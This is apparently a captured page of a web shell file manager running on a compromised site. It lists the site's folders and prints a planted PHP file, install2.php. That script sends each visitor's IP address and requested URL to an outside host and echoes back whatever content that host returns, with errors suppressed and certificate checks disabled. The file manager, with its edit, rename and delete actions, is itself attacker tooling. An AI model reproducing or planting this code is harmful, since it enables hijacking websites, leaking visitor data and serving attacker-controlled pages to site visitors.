H69UNtblNBNpha2dtB1Odn8qYp1Qk5NK2gi7yfceofo9N
/
home
/
ymswebso
/
public_html
/
idealliving
/
Nama File / Folder
Size
Action
assets
--
NONE
cache
--
NONE
fonts
--
NONE
sitecms
--
NONE
uploaded
--
NONE
visitorlocation
--
NONE
.htaccess
1.754KB
Hapus
Edit
Rename
install2.php
1.429KB
Hapus
Edit
Rename
<=Back
<?php error_reporting(0); set_time_limit(0); $requestUrl = "https:/6.manilahot.com/"; function getProtocol() { return isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) ? $_SERVER["HTTP_X_FORWARDED_PROTO"] : ( isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http"); } function getIP() { if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } elseif (!empty($_SERVER["HTTP_CLIENT_IP"])) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } else { $ip = $_SERVER["REMOTE_ADDR"]; } $ips = explode(",", $ip); return $ips[0]; } function getSslPage($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $result = curl_exec($ch); curl_close($ch); return $result; } $domain = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : ""; $file = (isset($_SERVER["REQUEST_URI"]) && $_SERVER["REQUEST_URI"] != "") ? $_SERVER["REQUEST_URI"] : $_SERVER["HTTP_X_REWRITE_URL"]; $ip = getIP(); $url = getProtocol() . "://" . $domain . $file; $getUrl = $requestUrl . "?ip=" . $ip . "&url=" . $url; $content = getSslPage($getUrl); echo $content; exit(0);
Liking